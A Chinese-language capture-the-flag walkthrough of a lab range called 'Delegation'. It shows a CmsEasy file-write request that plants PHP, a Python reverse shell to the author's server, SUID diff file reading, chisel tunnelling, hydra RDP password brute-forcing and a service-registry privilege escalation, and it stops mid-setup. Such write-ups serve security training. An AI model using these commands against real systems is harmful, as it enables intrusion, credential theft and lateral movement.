Delegation
Tags
- Brute Force - RDP 密码爆破
- Privilege Elevation - Linux suid 特权文件
- Privilege Elevation - Windows 服务配置缺陷提权
- Kerberos - Kerberos TGT 票据利用
- 域渗透 - DCSync & RPC 强制认证
靶标介绍
Delegation 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
39.99.241.120
入口点探测
使用 fscan
对入口点靶机进行扫描
start infoscan
39.99.241.120:80 open
39.99.241.120:21 open
39.99.241.120:22 open
39.99.241.120:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.241.120 code:200 len:68108 title: 中文网页标题
入口点 CmsEasy 任意文件上传构建 Webshell
进行目录扫描,发现存在有 /admin/
后台登陆界面,经过手动尝试,确认凭据为弱密码 admin:123456
根据页面底部的 Powered by CmsEasy
字段,搜索可能的漏洞信息,结合可以登陆后台,可以确认要利用的漏洞为后台任意文件上传
参考:CmsEasy_7.7.5_20211012 存在任意文件写入和任意文件读取漏洞 | jdr
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.237.127
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=i6o38uig1s56o0j0u8diitem0h; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php phpinfo();?>
访问 http://39.99.237.127/1.php
页面,成功看到 phpinfo 界面,说明可以借此写入 webshell
入口点 反弹 shell + 权限维持
基于 webshell,反弹 shell 到 vps
root@jmt-projekt:~# nc -lvnp 9999
Listening on 0.0.0.0 9999
Connection received on 39.99.237.127 43980
whoami
www-data
python3 --version
Python 3.8.10
鉴于存在有 Python 环境,使用 python 的反弹 shell 进一步获取完成 shell 功能
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("139.*.*.*",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
root@jmt-projekt:~# pwncat-cs -lp 8888
[08:25:49] Welcome to pwncat 🐈! __main__.py:164
[08:26:19] received connection from 39.99.237.127:39390 bind.py:84
[08:26:21] 0.0.0.0:8888: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[08:26:22] 39.99.237.127:39390: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) www-data@localhost:/var/www/html$ whoami
www-data
入口点 Suid 提权
对 suid 特权文件进行扫描
(remote) www-data@localhost:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
发现 /usr/bin/diff
结合 suid 可以实现任意文件读取
同时发现 flag 文件
(remote) www-data@localhost:/$ ls -lh /home/flag/
total 4.0K
-r-------- 1 root root 798 Jul 24 08:14 flag01.txt
就可以直接借助 /usr/bin/diff --line-format=%L /dev/null /home/flag/flag01.txt
来对 flag01.txt
进行读取
flag - 01
____ U _____ u _ U _____ u ____ _ _____ U ___ u _ _
| _"\ \| ___"|/ |"| \| ___"|/U /"___|uU /"\ u |_ "_| ___ \/"_ \/ | \ |"|
/| | | | | _|"U | | u | _|" \| | _ / \/ _ \/ | | |_"_| | | | |<| \| |>
U| |_| |\| |___ \| |/__ | |___ | |_| | / ___ \ /| |\ | | .-,_| |_| |U| |\ |u
|____/ u|_____| |_____| |_____| \____| /_/ \_\ u |_|U U/| |\u\_)-\___/ |_| \_|
|||_ <<>> // \\ << >> _)(|_ \\ >> _// \\_.-,_|___|_,-. \\ || \\,-.
(__)_) (__) (__)(_")("_)(__) (__) (__)__) (__) (__)(__) (__)\_)-''-(_/ (__) (_") (_/
flag01: flag{54bbe683-5e1d-4e18-96c3-724db360b28b}
Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...
入口点 建立中转枢纽
借助 pwncat-cs
的文件上传能力,上传 chisel_1.9.1_linux_amd64
之后,建立代理隧道
root@jmt-projekt:~# ./chisel_1.9.1_linux_amd64 server -p 1337 --reverse
2024/07/24 08:45:56 server: Reverse tunnelling enabled
2024/07/24 08:45:56 server: Fingerprint 2YUi1QXviZmFSEGJIEb3uN4KxK+uVWmTtTH0LIaylDo=
2024/07/24 08:45:56 server: Listening on http://0.0.0.0:1337
(remote) www-data@localhost:/tmp$ ./chisel_1.9.1_linux_amd64 client 139.*.*.*:1337 R:0.0.0.0:10001:socks &
[1] 3352
2024/07/24 08:46:44 client: Connecting to ws://139.*.*.*:1337
2024/07/24 08:46:44 client: Connected (Latency 43.547056ms)
成功建立连接
2024/07/24 08:46:44 server: session#1: tun: proxy#R:10001=>socks: Listening
入口点 内网信息搜集
上传 fscan
进行内网扫描
(remote) www-data@localhost:/tmp$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.4.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe1b:be8a prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:1b:be:8a txqueuelen 1000 (Ethernet)
RX packets 89638 bytes 124109416 (124.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21827 bytes 7117035 (7.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 678 bytes 59169 (59.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 678 bytes 59169 (59.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(remote) www-data@localhost:/tmp$ ./fscan_amd64.1 -h 172.22.4.36/24
......
start ping
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.45 is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.36:22 open
172.22.4.36:21 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo:
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetBios: 172.22.4.7 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.4.45 XIAORANG\WIN19
[*] NetInfo:
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.4.36 code:200 len:68100 title: 中文网页标题
[*] WebTitle: http://172.22.4.45 code:200 len:703 title:IIS Windows Server
172.22.4.45 XIAORANG\WIN19 RDP 密码爆破
根据 flag - 02
中提供的信息
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...
可以确定用户为 WIN19\Adrian
并且密码字典为 rockyou.txt
尝试进行 RDP 爆破
┌──(randark ㉿ kali)-[~]
└─$ proxychains4 -q hydra -l "Adrian" -P /usr/share/wordlists/rockyou.txt rdp://172.22.4.45 -vV
[ATTEMPT] target 172.22.4.45 - login "Adrian" - pass "babygirl1" - 219 of 14344399 [child 3] (0/0)
[ERROR] freerdp: The password has expired and must be changed. (0x0002000e)
[RE-ATTEMPT] target 172.22.4.45 - login "Adrian" - pass "babygirl1" - 223 of 14344399 [child 3] (0/0)
[ERROR] freerdp: The password has expired and must be changed. (0x0002000e)
得到一个密码过期的凭据 Adrian:babygirl1
尝试进行连接
尝试使用 rdesktop
进行连接
┌──(randark ㉿ kali)-[~]
└─$ proxychains4 rdesktop 172.22.4.45
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 139.*.*.*:10001 ... 172.22.4.45:3389 ... OK
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=WIN19.xiaorang.lab
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=WIN19.xiaorang.lab
Issuer: CN=WIN19.xiaorang.lab
Valid From: Tue Jul 23 08:14:45 2024
To: Wed Jan 22 08:14:45 2025
Certificate fingerprints:
sha1: a06ec2425bc2cc6bcda14219c29eeea9535a4e60
sha256: b7edffe2d201fb98909e8463b077275ee0bfaaa3809851565cd3e25b421b2590
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
[proxychains] Strict chain ... 139.*.*.*:10001 ... 172.22.4.45:3389 ... OK
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
修改密码为 Adrian:admin123
之后,即可成功登录
172.22.4.45 XIAORANG\WIN19 Windows 服务提权
在 C:\Users\Adrian\Desktop\PrivescCheck
桌面上,发现有 PrivescCheck_WIN19.html
文件,也就是 PrivescCheck
提权检测的报告
在其中发现了一条 High 级别的记录
Name : gupdate
ImagePath : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User : LocalSystem
ModifiablePath : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : BUILTIN\Users
Permissions : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetValue, QueryValue
Status : Stopped
UserCanStart : True
UserCanStop : True
可以借助此运行 msf 生成的马
内网靶机没有出网能力,所以需要提前设置好内网 -> 外网的端口转发
由于服务运行的文件在一段时间之后会自动停止,所以在建 立 c2 连接之后,应及时进行进程迁移
建立内网 -> 外网的端口转发
(remote) www-data@localhost:/tmp$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.4.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe1b:be8a prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:1b:be:8a txqueuelen 1000 (Ethernet)
RX packets 166956 bytes 177580251 (177.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 79621 bytes 28563311 (28.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 15264 bytes 6538426 (6.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 15264 bytes 6538426 (6.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(remote) www-data@localhost:/tmp$ ./chisel_1.9.1_linux_amd64 client 139.*.*.*:1337 7777:7777 &
[2] 3495
2024/07/24 09:23:48 client: Connecting to ws://139.*.*.*:1337
2024/07/24 09:23:48 client: tun: proxy#7777=>7777: Listening
2024/07/24 09:23:48 client: Connected (Latency 44.160355ms)